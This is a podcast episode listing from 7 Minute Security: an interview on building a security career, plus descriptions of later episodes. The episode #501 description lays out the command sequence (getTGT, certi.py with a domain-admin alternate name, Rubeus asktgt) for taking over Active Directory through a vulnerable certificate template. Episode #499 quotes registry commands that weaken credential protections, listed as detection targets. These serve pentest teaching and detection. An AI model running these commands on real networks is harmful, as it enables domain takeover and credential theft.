7MS #342: Interview with Matt McCullough
7 Minute Security27 Dec 2018

7MS #342: Interview with Matt McCullough

Matt McCullough (a.k.a. Matty McFly on Slack) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career opportunities, Matt now rocks a SOC job. Matt and I sat down to talk about a lot of good stuff:

  • How to start an IT career as "the family IT guy"

  • Leveraging a higher education (at places like Lake Superior College to meet people of influence and start networking like a beast

  • Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone

  • MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily into the security realm.

  • If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS

  • Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle!

  • Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop

  • Attend security conferences(or start your own)!

...more notes at 7MS.us!

Avsnitt(685)

7MS #501: Tales of Pentest Pwnage - Part 31

7MS #501: Tales of Pentest Pwnage - Part 31

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows: Grab Certi Grab Certify Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed: msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands: sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do: rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

29 Dec 202144min

7MS #500: Interview with John Strand

7MS #500: Interview with John Strand

HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the (perceived) cybersecurity talent shortage, how to get started with good security practices in your organization, and more! P.S. check out John's first visit to the show here.

22 Dec 202158min

7MS #499: Desperately Seeking a Super SIEM for SMBs - Part 6

7MS #499: Desperately Seeking a Super SIEM for SMBs - Part 6

Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment: ASREPRoasting WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1) Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info

16 Dec 202121min

7MS #498: Securing Your Mental Health - Part 2

7MS #498: Securing Your Mental Health - Part 2

Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health. Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome in the face, and be an overall happier and more positive person.

13 Dec 202117min

7MS #497: The Stress and Satisfaction of Offering Live Security Training

7MS #497: The Stress and Satisfaction of Offering Live Security Training

Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy, and the cool (and expensive!) cloud options we're considering to offer a self-paced version of the course.

2 Dec 202151min

7MS #496: Tales of Pentest Pwnage - Part 30

7MS #496: Tales of Pentest Pwnage - Part 30

Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including: The new Responder DHCP poisoning module All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules! Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon). I close out today's episode with a story about how my Cobalt Strike beacons got burned by a dating site!

24 Nov 202148min

7MS #495: Desperately Seeking a Super SIEM for SMBs - Part 5

7MS #495: Desperately Seeking a Super SIEM for SMBs - Part 5

Today we continue our SIEM/SOC evaluation series with a closer look at one particular managed solution and how it fared (very well) against a very hostile environment: the Light Pentest LITE pentesting course! Spoiler alert: this solution was able to detect: RDP from public IPs Password spraying Kerberoasting Mimikatz Recon net commands Hash dumping Hits on a "honey domain admin" account Users with non-expiring passwords Hits on the SSH/FTP/HTTP honeypot

17 Nov 202139min

7MS #494: Interview with Josh Burnham of Liquid Web

7MS #494: Interview with Josh Burnham of Liquid Web

10 Nov 202145min

Populärt inom Politik & nyheter

p3-krim
rss-krimstad
rss-viva-fotboll
flashback-forever
rss-sanning-konsekvens
aftonbladet-daily
olyckan-inifran
svenska-fall
rss-vad-fan-hande
svd-dokumentara-berattelser-2
motiv
krimmagasinet
fordomspodden
dagens-eko
rss-frandfors-horna
blenda-2
svd-nyhetsartiklar
spotlight
spar
rss-svalan-krim